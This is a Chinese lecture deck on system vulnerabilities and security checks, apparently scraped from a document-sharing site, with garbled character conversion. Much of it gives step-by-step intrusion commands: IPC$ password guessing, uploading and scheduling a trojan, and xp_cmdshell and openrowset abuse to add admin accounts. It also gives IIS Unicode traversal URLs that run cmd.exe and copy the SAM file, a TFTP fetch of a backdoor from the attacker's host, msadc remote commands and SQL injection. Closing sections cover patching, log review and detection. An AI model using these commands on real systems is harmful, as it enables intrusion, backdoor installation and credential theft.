系統(tǒng)安全漏洞與安全檢測_第1頁
系統(tǒng)安全漏洞與安全檢測_第2頁
系統(tǒng)安全漏洞與安全檢測_第3頁
系統(tǒng)安全漏洞與安全檢測_第4頁
系統(tǒng)安全漏洞與安全檢測_第5頁
已閱讀5頁,還剩54頁未讀 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

藍(lán)盾網(wǎng)絡(luò)平安講座-----張賀勛藍(lán)盾平安小組系統(tǒng)平安漏洞與平安檢測目錄漏洞的形成漏洞的分類漏洞的檢測工具漏洞的防范方法平安檢測的目的常見平安檢測的內(nèi)容專業(yè)平安檢測的內(nèi)容一、漏洞形成后門:大型軟件、系統(tǒng)的編寫,是許多程序員共同完成。他們是將一個軟件或系統(tǒng)分成假設(shè)干板塊,分工編寫,然后再匯總,測試。最后,修補(bǔ),發(fā)布。在軟件匯總時(shí),為了測試方便,程序員總會留有后門;在測試以后再進(jìn)行修補(bǔ)……這些后門,如果一旦疏忽〔或是為某種目的成心留下〕,或是沒有發(fā)現(xiàn),軟件發(fā)布后自然而然就成了漏洞。程序假設(shè)干板塊之間的空隙:這里很容易出現(xiàn)連程序員的都沒想到的漏洞!藍(lán)盾平安小組網(wǎng)絡(luò)協(xié)議:網(wǎng)絡(luò)協(xié)議有TCP、UDP、ICMP、IGMP等。其實(shí),他們本來的用途是好的,但卻被別人用于不乏的活動:例如,ICMP本來是用于尋找網(wǎng)絡(luò)相關(guān)信息,后來卻被用于網(wǎng)絡(luò)嗅探和攻擊;TCP本來是用于網(wǎng)絡(luò)傳輸,后來卻被用于泄漏用戶信息。程序員自身的素質(zhì):程序員的自身對網(wǎng)絡(luò)平安認(rèn)識的不夠,寫出的程序自身就有漏洞。二、系統(tǒng)漏洞的分類

操作系統(tǒng)漏洞應(yīng)用平臺的漏洞應(yīng)用系統(tǒng)的漏洞網(wǎng)絡(luò)系統(tǒng)漏洞操作系統(tǒng)的漏洞弱口令弱口令就是用戶的操作密碼過于簡單〔如‘123’〕。描述:本漏洞的危害性極強(qiáng),它可以對系統(tǒng)效勞器作任何的操作。主要是因?yàn)楣芾韱T的平安意識缺乏。測試目的:用本漏洞控制效勞器系統(tǒng)。〔1〕我們可以用爆力破解工具或掃描器〔XSCAN等〕對機(jī)器進(jìn)行掃描,可得到管理員密碼。只要擁有管理員級權(quán)限,就能完全共享應(yīng)用對方的機(jī)器,如下面的命令會將對方的C盤映射為自己的X盤:

c:\>netusex:\\[目標(biāo)主機(jī)的IP地址]\c$"[密碼]"/user:"[用戶名]"

其中"c$"為系統(tǒng)默認(rèn)共享,依此類推,同樣可以共享對方的"d$","e$〔2〕運(yùn)行AT命令。C:\>netstartschedule

Schedule正在啟動效勞.....

Schedulw效勞啟動成功。

AT的語法:

AT[\\computername][time]"command"

比方:

AT[\\computername][time]runnc.bat〔3〕用遠(yuǎn)程控制終端輸入法漏洞描述:輸入法漏洞可以說是中文Windows2000推出后的第一個致命漏洞,通過它我們可以做許多的事情,包括建立用戶.測試1:使用文件類型編輯創(chuàng)立管理員用戶

1.開機(jī)到登陸界面調(diào)出輸入法,如全拼->幫助->操作指南,跳出輸入法指南幫助文件

2.右擊"選項(xiàng)"按鈕,選擇"跳至url"

3.在跳至URL上添上"c:\",其它的也可.

4.幫助的右邊會進(jìn)入c:5.按幫助上的"選項(xiàng)"按鈕.

6.選"internet"選項(xiàng).會啟動文件類型編輯框.

7.新建一個文件類型,如一個you文件類型,在跳出的文件后綴中添上"you".確定.

8.選中文件類型框中的"you"文件類型,點(diǎn)擊下面的"高級按鈕",會出現(xiàn)文件操作對話框.

9.新建一種文件操作,操作名任意寫,如"ppp"

10.該操作執(zhí)行的命令如下:

C:\WINNT\system32\cmd.exe

/c

net

user

mayi

123456

/add

&

C:\WINNT\system32\cmd.exe

/c

net

localgroup

administrators

aboutnt

/add

完成后退出

11.將c:\的某個文件如"pipi.txt"改為"pipi.txt.mayi",然后雙擊翻開這個文件.

12.通常這個文件是打不開的,系統(tǒng)運(yùn)行一會便沒有了提示,但這時(shí)我們已經(jīng)將用戶mayi加上了,權(quán)限是管理員.

13.返回,重新以aboutnt用戶登錄即可。IPC$共享漏洞描述:危害性大,主要是和其它漏洞一塊使用IPC$(Inter-ProcessCommunication)共享是NT計(jì)算機(jī)上的一個標(biāo)準(zhǔn)的隱含共享,它是用于效勞器之間的通信的。NT計(jì)算機(jī)通過使用這個共享來和其他的計(jì)算機(jī)連接得到不同類型的信息的。常常可利用這一點(diǎn)來,通過使用空的IPC會話進(jìn)行攻擊。測試1:通過本漏洞猜測用戶密碼c:\>netuse\\[目標(biāo)機(jī)器的IP地址]\ipc$/user:<name><passwd>當(dāng)這個連接建立后,要將username和password送去加以確認(rèn)。如果你以"Administrator"登錄,那么需要進(jìn)行口令猜測??梢灾貜?fù)使用'net'命令,進(jìn)行username和password猜測:c:\>netuse\\xxx.xxx.xxx.xxx\ipc$/user:<name><passwd>也可以使用腳本語句:open(IPC,"netuse\\xxx.xxx.xxx.xxx\ipc$/user:<name><passwd>");看看目標(biāo)計(jì)算機(jī)上有那些共享的資源可以用下面命令:c:\>netview\\[目標(biāo)計(jì)算機(jī)的IP地址]一旦IPC$共享順利完成,下一個命令是:c:\>netuseg:\\xxx.xxx.xxx.xxx\c$得到了C$共享,并將該目錄映射到g:,鍵入:c:\>dirg:/p就能顯示這個目錄的所有內(nèi)容。測試2:通過測試1來上傳木馬控制效勞器c:\>netuse\\\ipc$〞〞/user:〞admin〞此時(shí),cmd會提示命令成功完成。這樣你就和建立了IPC連接。c:\>copyserver.exe\\\admin$上傳server.exe到的winnt目錄,因?yàn)閣innt目錄里的東西比較多,管理員不容易發(fā)現(xiàn),所以我們把server.exe上傳到里面。Server.exe是janker寫的winshell生成的程序,WinShell是一個運(yùn)行在Windows平臺上的Telnet效勞器軟件。c:\>nettime\\這個命令可以的到的系統(tǒng)時(shí)間,例如是00:00c:\>at\\00:01〞server.exe〞cmd會提示新加了一項(xiàng)任務(wù),其作業(yè)ID為1,這樣遠(yuǎn)程系統(tǒng)會在00:01時(shí)運(yùn)行server.exe。c:\>at\\1這樣可以查看ID為1的作業(yè)情況。c:\>netuse\\\ipc$/delete退出IPC連接。現(xiàn)在,server.exe已經(jīng)在遠(yuǎn)程主機(jī)上運(yùn)行了。輸入:c:\>telnet21〔端口可以自己在winshell中設(shè)定〕這樣就成功的telnet到上了。應(yīng)用平臺的漏洞SQLSERVER存在的一些平安漏洞:“SA〞帳號弱口令描述:危害性極強(qiáng),它可以完作控制系統(tǒng)效勞器。存在“sa〞帳戶,密碼就為空,或密碼過于簡單,我們就可以通過掃描工具〔如X-SCAN等〕得到密碼,用測試:通過XP-CMDSHEll來增加一個帳號如:Xp_cmdshell"netusertestuser/ADD"然后在:Xp_cmdshell"netlocalgroupAdministratorstestuser/ADD"這樣攻擊者就成功的在SQLSERVER上增加了一個用戶。當(dāng)然遠(yuǎn)程的話,一般需要有1433口開著,通過MSSQL客戶端進(jìn)行連接。最后你可以用添加的用戶名通過遠(yuǎn)程控制終端來控制你效勞器系統(tǒng)。擴(kuò)展存儲過程參數(shù)解析漏洞:描述:危害性極強(qiáng),它可以完作控制系統(tǒng)效勞器。起主要問題是在MSD中提供一個API函數(shù)srv_paraminfo(),它是用來擴(kuò)展存儲過程調(diào)用時(shí)解釋深入?yún)?shù)的,如:exec<存儲過程名><參數(shù)1>,<參數(shù)2>,...如要查詢“c:\winnt〞的目錄樹,可以如下表達(dá):execxp_dirtree'c:\winnt'但沒有檢查各個參數(shù)的長度,傳遞相當(dāng)長的字符串,就存在了覆蓋其他堆棧參數(shù)的可能導(dǎo)致緩沖溢出。目前受影響的擴(kuò)展存儲過程如下:xp_printstatements(xprepl.dll)xp_proxiedmetadata(xprepl.dll)xp_SetSQLSecurity(xpstar.dll)…關(guān)于openrowset和opendatasource

描述:危害性極強(qiáng),它可以完作控制系統(tǒng)效勞器。利用openrowset發(fā)送本地命令

,通常我們的用法是〔包括MSDN的列子〕如下

select

*

from

openrowset(''sqloledb'',''myserver'';''sa'';'''',''select

*

from

table'')

可見〔即使從字面意義上看)openrowset只是作為一個快捷的遠(yuǎn)程數(shù)據(jù)庫訪問,它必須跟在select后面,也就是說需要返回一個recordset

那么我們能不能利用它調(diào)用xp_cmdshell呢?答案是肯定的!

select

*

from

openrowset(''sqloledb'',''server'';''sa'';'''',''set

fmtonly

off

exec

master.dbo.xp_cmdshell

''''dir

c:\'''''')

必須加上set

fmtonly

off用來屏蔽默認(rèn)的只返回列信息的設(shè)置,這樣xp_cmdshell返回的output集合就會提交給前面的select顯示,如果采用

默認(rèn)設(shè)置,會返回空集合導(dǎo)致select出錯,命令也就無法執(zhí)行了。

那么如果我們要調(diào)用sp_addlogin呢,他不會像xp_cmdshell返回任何集合的,我們就不能再依靠fmtonly設(shè)置了,可以如下操作

select

*

from

openrowset(''sqloledb'',''server'';''sa'';'''',''select

''''OK!''''

exec

master.dbo.sp_addlogin

Hectic'')

這樣,命令至少會返回select

''OK!''的集合,你的機(jī)器商會顯示OK!,同時(shí)對方的數(shù)據(jù)庫內(nèi)也會增加一個Hectic的賬號,也就是說,我們利用

select

''OK!''的返回集合欺騙了本地的select請求,是命令能夠正常執(zhí)行,通理sp_addsrvrolemember和opendatasource也可以如此操作!

IIS漏洞IISunicode漏洞描述:危害性極強(qiáng),可以完全的控制效勞器。對于IIS5.0/4.0中文版,當(dāng)IIS收到的URL請求的文件名中包含一個特殊的編碼例如“%c1%hh〞或者“%c0%hh〞,它會首先將其解碼變成:0xc10xhh,然后嘗試翻開這個文件,Windows系統(tǒng)認(rèn)為0xc10xhh可能是unicode編碼,因此它會首先將其解碼,如果0x00<=%hh<0x40的話,采用的解碼的格式與下面的格式類似:%c1%hh->(0xc1-0xc0)*0x40+0xhh%c0%hh->(0xc0-0xc0)*0x40+0xhh例如,在Windows2000簡體中文版+IIS5.0+SP1系統(tǒng)下測試:://target/A.ida/%c1%00.idaIIS會報(bào)告說"@.ida"文件找不到這里:〔0xc1-0xc0)*0x40+0x00=0x40='@'://target/A.ida/%c1%01.idaIIS會報(bào)告說"A.ida"文件找不到這里:〔0xc1-0xc0)*0x40+0x01=0x41='A'攻擊者可以利用這個漏洞來繞過IIS的路徑檢查,去執(zhí)行或者翻開任意的文件。測試1:下面的URL可能列出當(dāng)前目錄的內(nèi)容:://victim/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir測試2:利用這個漏洞查看系統(tǒng)文件內(nèi)容也是可能的:://victim/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini測試3:刪除空的文件夾命令:

://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+rd+c:\snowspider

測試4:刪除文件的命令:

://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:\autoexec.bak

測試5:Copy文件

://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot\

測試5:用木馬〔用TFTP、NCX99〕在地址欄里填入::///scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp-i???.???.???.???GETncx99.exec:\\inetpub\\scripts\\sr.exe???.???.???.???為你自己的IP,

注意:c:\\inetpub\\scripts\\sr.exe其中c:\\inetpub\\scripts\\為主機(jī)效勞器目錄,要看主機(jī)的具體情況而定,sr.exe為被改名的ncx99.exe〔自己選名字吧〕。然后等待...大概3分鐘...IE瀏覽器左下角顯示完成,紅色漏斗消失,這時(shí)ncx99.exe已經(jīng)上傳到主機(jī)c:\inetpub\scripts\目錄了,您可以自己檢查一下。再使用如下調(diào)用來執(zhí)行ncx99.exe(sr.exe):///scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\sr.exe然后您就可以telnet99printer遠(yuǎn)程緩存溢出漏洞緩存溢出:緩存溢出又稱為緩沖溢出,緩沖區(qū)指一個程序的記憶范圍(領(lǐng)域),該領(lǐng)域是用來儲存一些數(shù)據(jù),如電腦程序信息,中間計(jì)算結(jié)果,或者輸入?yún)?shù)。把數(shù)據(jù)調(diào)入緩沖區(qū)之前,程序應(yīng)該驗(yàn)證緩沖區(qū)有足夠的長度以容納所有這些調(diào)入的數(shù)據(jù)。否那么,數(shù)據(jù)將溢出緩沖區(qū)并覆寫在鄰近的數(shù)據(jù)上,當(dāng)它運(yùn)行時(shí),就如同改寫了程序。假設(shè)溢出的數(shù)據(jù)是隨意的,那它就不是有效的程序代碼,當(dāng)它試圖執(zhí)行這些隨意數(shù)據(jù)時(shí),程序就會失敗。另一方面,假設(shè)數(shù)據(jù)是有效的程序代碼,程序?qū)凑諗?shù)據(jù)提供者所設(shè)定的要求執(zhí)行代碼和新的功能。描述:漏洞的活動范圍是:這是一個緩存溢出漏洞,這漏洞比以往的普通溢出存在更大的危害,主要有兩方面的原因:*在缺省平安的情況下,該漏洞可以被來自網(wǎng)絡(luò)的利用。*可以完全獲得和控制存在該漏洞的網(wǎng)站效勞器。一旦溢出成功,他可以做他想做的一些事情,包括:安裝和運(yùn)行程序,重新配置效勞,增加、改變或者刪除文件和網(wǎng)頁的內(nèi)容等等。漏洞的起因是:WIN2K在網(wǎng)絡(luò)打印ISAPI擴(kuò)展上缺少足夠的緩沖區(qū)檢查,當(dāng)一個發(fā)出特殊的請求效勞時(shí)產(chǎn)生緩存溢出,可以讓在本地系統(tǒng)執(zhí)行任意代碼。測試:通過IIS5HACK工具來檢用信息iis5hacksomeip803iis5remote.printeroverflow.writenbysunx://fortestonly,dontusedtohack,:pconnecting...sending...Nowyoucantelnetto99portgoodluck:)c:\telnet699MicrosoftWindows2000[Version5.00.2195](C)Copyright1985-2000MicrosoftCorp.C:\WINNT\system32>已經(jīng)進(jìn)入目標(biāo)主機(jī),你想干什么就是你的事啦。IISIndexServer(.ida/idq)ISAPI擴(kuò)展遠(yuǎn)程溢出漏洞描述:危害性極強(qiáng),它可以完作控制系統(tǒng)效勞器。微軟IIS缺省安裝情況下帶了一個索引效勞器(IndexServer,在Windows2000下名為"IndexService").缺省安裝時(shí),IIS支持兩種腳本映射:管理腳本(.ida文件)、Inernet數(shù)據(jù)查詢腳本(.idq文件)。這兩種腳本都由一個ISAPI擴(kuò)展-idq.dll來處理和解釋。由于idq.dll在處理某些URL請求時(shí)存在一個未經(jīng)檢查的緩沖區(qū),如果攻擊者提供一個特殊格式的URL,就可能引發(fā)一個緩沖區(qū)溢出。通過精心構(gòu)造發(fā)送數(shù)據(jù),攻擊者可以改變程序執(zhí)行流程,執(zhí)行任意代碼。成功地利用這個漏洞,攻擊者可以遠(yuǎn)程獲取"LocalSystem"權(quán)限。測試:來控制效勞器。運(yùn)行IDQGUI程序,出現(xiàn)一個窗口,填好要入侵的主機(jī)IP,選取所對應(yīng)的系統(tǒng)SP補(bǔ)丁欄,其他設(shè)置不改,取默認(rèn)。然后按右下角的IDQ益出鍵。

如果成功如圖如果不成功會提示連接錯誤。連接成功后,我們翻開WIN下的DOS狀態(tài),輸入:NC-VVX.X.X.X813

如果成功如圖不成功的話可以在IDQGUI程序里換另一個SP補(bǔ)丁欄試試,如果都不行,就放棄。換其他漏洞機(jī)器。4、應(yīng)用系統(tǒng)漏洞編程語言漏洞MDB數(shù)據(jù)庫可下載漏洞描述:危害性強(qiáng),可以得到網(wǎng)站的所有內(nèi)容。數(shù)據(jù)庫中一般存放的是客戶的帳號、密碼以及網(wǎng)站的中所有內(nèi)容,如果得到了數(shù)據(jù)庫,也就可以說得到了網(wǎng)站的一功,原理,WEB效勞器遇到不能解釋的文件是就給下載,測試:在地址欄輸入://someurl/path/name.mdb,你會發(fā)現(xiàn)name.mdb的數(shù)據(jù)庫給下載下來。SQL語句漏洞描述:危害性強(qiáng),可以進(jìn)入網(wǎng)站的后臺應(yīng)用程序。假設(shè)沒有過濾必要的字符:

select

*

from

login

where

user='$HTTP_POST_VARS[user]'

and

pass='$HTTP_POST_VARS[pass]'

我們就可以在用戶框和密碼框輸入1'

or

1='1通過驗(yàn)證了。這是非常古董的方法了,這個語句會替換成這樣:

select

*

from

login

where

user='1'

or

1='1'

and

pass='1'

or

1='1'

因?yàn)閛r

1='1'成立,所以通過了。解決的方法最好就是過濾所有不必要的字符,Jsp代碼泄漏漏洞描述:危害性強(qiáng),有可能可以查看到數(shù)據(jù)庫帳號密碼。

在訪問JSP頁面時(shí),如果在請求URL的.jsp后綴后面加上一或多個‘.‘、‘%2E’、‘+’、‘%2B’、‘\’、‘%5C’、‘%20’、‘%00’,會泄露JSP源代碼。測試:查看網(wǎng)頁源代碼://localhost:8080/index.jsp效勞器會正常解釋。

://localhost:8080/index.jsp.只要在后面加上一個.就會導(dǎo)致源代碼泄漏(可以通過瀏覽器的查看源代碼看到)。

原因:

由于Windows在處理文件名時(shí),將"index.jsp"和"index.jsp."認(rèn)為是同一個文件。

CGI漏洞x.htworqfullhit.htworiirturnh.htw

描述:危害性強(qiáng),IIS4.0上有一個應(yīng)用程序映射htw--->webhits.dll,這是用于IndexServer的點(diǎn)擊功能的。盡管你不運(yùn)行IndexServer,該映射仍然有效。這個應(yīng)用程序映射存在漏洞,允許入侵者讀取本地硬盤上的文件,數(shù)據(jù)庫文件,和ASP源代碼。一個攻擊者可以使用如下的方法來訪問系統(tǒng)中文件的內(nèi)容:

://victim/iissamples/issamples/oop/qfullhit.htw?

ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full就會在有此漏洞系統(tǒng)中win.ini文件的內(nèi)容。webhits.dll后接上"../"便可以訪問到Web虛擬目錄外的文件,下面我們來看個例子:

://somerul/iissamples/issamples/oop/qfullhit.dll?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full

在瀏覽器中輸入該地址,便可以獲得該效勞器上給定日期的Web日志文件.在系統(tǒng)常見的.htw樣本文件有:/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/iissamples/exair/search/qfullhit.htw

/iissamples/exair/search/qsumrhit.hw

/iishelp/iis/misc/iirturnh.htw[這個文件通常受loopback限制]

利用inetinfo.exe來調(diào)用webhits.dll,這樣同樣能訪問到Web虛擬目錄外的文件,這樣請求一個.htw文件:

://url/default.htm.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1

/ex000121.log&CiRestriction=none&CiHiliteType=Full

這個請求肯定會失敗,但請注意,我們現(xiàn)在已經(jīng)調(diào)用到了webhits.dll,我們只要在一個存在的文件資源后面[也就是在.htw前面]加上一串特殊的數(shù)字(%20s),[就是在例子中default.htm后面加上這個代表空格的特殊數(shù)字],這樣我們便可以欺騙過web效勞器從而到達(dá)我們的目的.由于在緩沖局部中.htw文件名字局部被刪除掉[由于%20s這個符號],所以,當(dāng)請求傳送到webhits.dll的時(shí)候,便可以成功的翻開該文件,并返回給客戶端,而且過程中并不要求系統(tǒng)中真的存在.htw文件。比方:

://url/default.htm%20s.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1

/ex000121.log&CiRestriction=none&CiHiliteType=Full解決方法:hit-highligting功能是由IndexServer提供的允許一個WEB用戶在文檔上highlighted〔突出〕他們原始搜索的條目,這個文檔的名字通過變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個ISAPI應(yīng)用程序來處理請求,翻開文件并返回結(jié)果,當(dāng)用戶控制了CiWebhitsfile參數(shù)傳遞給.htw時(shí),他們就可以請求任意文件,結(jié)果就是導(dǎo)致查看ASP源碼和其他腳本文件內(nèi)容。要了解你是否存在這個漏洞,你可以請求如下條目:://victim/nosuchfile.htw

如果你從效勞器端獲得如下信息:

formatoftheQUERY_STRINGisinvalid

這就表示你存在這個漏洞。

這個問題主要就是webhits.dll關(guān)聯(lián)了.htw文件的映射,所以你只要取消這個映射就能防止這個漏洞,你可以在你認(rèn)為有漏洞的系統(tǒng)中搜索.htw文件,一般會發(fā)現(xiàn)如下的程序:

/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/isssamples/exair/search/qfullhit.htw

/isssamples/exair/search/qsumrhit.htw

/isshelp/iss/misc/iirturnh.htw(這個一般為loopback使用)msadc描述:IIS的MDAC組件存在一個漏洞可以導(dǎo)致攻擊者遠(yuǎn)程執(zhí)行你系統(tǒng)的命令。主要核心問題是存在于RDSDatafactory,默認(rèn)情況下,它允許遠(yuǎn)程命令發(fā)送到IIS效勞器中,這命令會以設(shè)備用戶的身份運(yùn)行,其一般默認(rèn)情況下是SYSTEM用戶。測試:結(jié)合木馬來控制效勞器C:\Perl\BIN>perl-xmsadc2.pl-h目標(biāo)機(jī)xxx.xxx.xxx.xxxPleasetypetheNTcommandlineyouwanttorun(cmd/cassumed):\ncmd/c一般這里我用TFTP上傳我的木馬文件,但首先你得先設(shè)置好你的TFTP主機(jī)tftp-igetntsrv.exec:\winnt\system32\ntsrv.exe這里

是我的TFTP主機(jī),TFTP目錄下有NTSRV。EXE木馬如果程序執(zhí)行成功,TFTP會顯示文件傳輸?shù)倪M(jìn)度,然后再執(zhí)行PERL,將木馬激活,你再用木馬連上對方的機(jī)器,搞定2、C:\Perl\BIN>perl-xmsadc2.pl-h目標(biāo)機(jī)cmd/cnetuserpt007/add3、C:\Perl\BIN>perl-xmsadc2.pl-h目標(biāo)機(jī)cmd/cnetuserpt007ptlove4、C:\Perl\BIN>perl-xmsadc2.pl-h目標(biāo)機(jī)cmd/cnetlocalgroupadministratorspt007/add5、C:\Perl\BIN>perl-xmsadc2.pl-h目標(biāo)機(jī)cmd/cc:\winnt\system32>ncx99.exeuploader.exe

描述:本漏洞的危害性強(qiáng),如果您使用NT作為您的WebServer的操作系統(tǒng),入侵者能夠利用uploader.exe上傳任何文件。

測試:上傳一個木馬在地址欄輸入:://host/cgi-win/uploader.exe

會帶你到上傳頁面三、漏洞檢測工具商業(yè)ISSBD-SCANNERN-STEALTHPROMISCAN自由HFNETCHKX-SCAN流光四、漏洞的解決方法打補(bǔ)丁打?qū)?yīng)的補(bǔ)丁是最好的解決方法,可以到微軟下載中心://microsoft/downloads/search.asp下載所需的補(bǔ)丁。另注意以后要不斷下載升級補(bǔ)丁。用IISLOCKTOOLS

防火墻五、平安檢測目地對系統(tǒng)漏洞的發(fā)現(xiàn)確定是否被入侵過1、日志的檢測〔1〕日志的分類操作系統(tǒng)平安日志應(yīng)用程序日志系統(tǒng)日志應(yīng)用系統(tǒng)其它HTTP狀態(tài)代碼說明200代碼說明了所有的工作一切正常,傳輸過程很成功201代碼說明成功發(fā)出并執(zhí)行了一POST命令202代碼說明客戶的命令由效勞器接受以進(jìn)行處理204代碼說明客戶的請求得到處理,效勞器不能返回?cái)?shù)據(jù)300代碼說明客戶請求的數(shù)據(jù)最近被移走301代碼說明效勞器發(fā)現(xiàn)客戶所請求的數(shù)據(jù)位于一個替代的臨時(shí)重定向的URL302代碼說明效勞器建議客戶到一個替代的位置去請求數(shù)據(jù)303代碼說明出現(xiàn)了一個問題,效勞器不能修改請求數(shù)據(jù)400代碼說明客戶發(fā)出了一個異常的請求,因此不能被處理401代碼說明客戶試圖訪問一個未被授權(quán)的訪問的數(shù)理403代碼說明訪問被禁止404代碼說明文檔未找到500說明一個效勞器不能恢復(fù)的內(nèi)部效勞器錯誤502代碼說明效勞器過載目地:發(fā)現(xiàn)CGI漏洞入侵者,以及WEB效勞的情況平安性日志平安性根本上捕獲那些成功和失敗審核事件,同時(shí)對這種事性的概述很簡單。如以下圖WIN2000系統(tǒng)日志IIS日志路徑:c:\winnt\system32\logfile\w3svc1FTP日志路徑:c:\winnt\system32\logfile\MSFTPSVC12、端口掃描作用:發(fā)現(xiàn)木馬和確定開通的效勞。工具:SUPERSCAN、PORTSCAN、3、網(wǎng)絡(luò)的監(jiān)視作用:發(fā)現(xiàn)網(wǎng)絡(luò)攻擊工具:TCPDUMP〔LINUX〕、WINDUMP〔WINDOWS〕、命今NETSTAT4、檢查用戶帳號和組信息啟動"用戶管理器"程序,或者在命令行狀態(tài)下執(zhí)行"netuser"、"netgroup"和"netlocalgroup"命令,查看當(dāng)前用戶和組清單,確保內(nèi)置GUEST帳號被禁止使用:看看是否有非法組成員存在。默認(rèn)安裝后的組都具有特殊權(quán)限,例如,Administrators組成員有權(quán)對本地系統(tǒng)做任何事情,Backupoperators組成員有權(quán)讀取系統(tǒng)中的所有文件,PowerUsers組成員有權(quán)創(chuàng)立共享。不要讓一些不適宜的用戶隱藏在這些組中。5、定時(shí)任務(wù)中是否存在可疑程序檢查定時(shí)任務(wù)中是否存在可疑程序。攻擊者可以讓后門程序定時(shí)運(yùn)行,以便將來重新入侵。更進(jìn)一步地,要準(zhǔn)確核對定時(shí)任務(wù)所對應(yīng)的實(shí)際程序名是否合法。在命令行狀態(tài)下執(zhí)行“at〞命令可以很方便地看到這些信息。6、臨時(shí)進(jìn)程檢查是否存在臨時(shí)進(jìn)程。要獲取這些信息,可以借助任務(wù)管理器、也可以在命令行執(zhí)行pulist.exe和tlist.exe。pulist可以查看每個進(jìn)程由誰啟動,tlist-f可以查看哪個進(jìn)程又啟動了子進(jìn)程。7、檢測混雜模式的網(wǎng)卡作用:確認(rèn)是否被監(jiān)聽。軟件:PROMISCAN嗅探行為已經(jīng)成為網(wǎng)絡(luò)平安的一個巨大威脅。通過網(wǎng)絡(luò)嗅探,一些惡意用戶能夠很容易地竊取到絕密的文檔和任何人的隱私。要實(shí)現(xiàn)上述目的非常容易,惡意用戶只要從網(wǎng)絡(luò)上下載嗅探器并平安到自己的計(jì)算機(jī)就可以了。然而,卻沒有一個很好的方法來檢測網(wǎng)絡(luò)上的嗅探器程序,以下將討論使用地址解析協(xié)議(AddressResolutionProtocol)報(bào)文來有效地檢測網(wǎng)絡(luò)上的嗅探器程序。原理和檢測方法:例如:網(wǎng)絡(luò)上一臺IP地址為的PC(X)以太網(wǎng)地址是00-00-00-00-00-01,這臺PC(X)需要向網(wǎng)絡(luò)上另外一臺IP地址為0的PC(Y)發(fā)送消息。在發(fā)送之前,X首先發(fā)出一個ARP請求包查詢0對應(yīng)的以太網(wǎng)地址。查詢包的目的地址被設(shè)置為FF-FF-FF-FF-FF-FF(播送),從而本地網(wǎng)絡(luò)上的所有節(jié)點(diǎn)都可以收到這個包。收到之后,每個節(jié)點(diǎn)會檢查這個ARP包查詢的IP地址和本機(jī)的IP地址是否匹配。如果不同,就忽略這個ARP包;如果匹配(Y)就向X發(fā)出應(yīng)答。X收到應(yīng)答之后就緩存Y的IP/硬件地址。然后

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論